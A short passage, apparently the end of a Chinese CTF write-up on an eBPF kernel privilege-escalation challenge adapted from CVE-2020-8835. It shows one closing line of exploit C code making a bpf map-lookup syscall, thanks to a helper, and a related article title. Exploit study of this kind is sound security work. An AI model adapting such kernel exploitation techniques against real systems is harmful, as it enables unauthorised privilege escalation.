syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr)); }
这道题目很好地改编了CVE,非常考验对于bpf指令检测的了解和调试,综合难度很高,再次感谢sunichi
师傅的帮助。
CVE-2020-8835 pwn2own 2020 ebpf 提权漏洞分析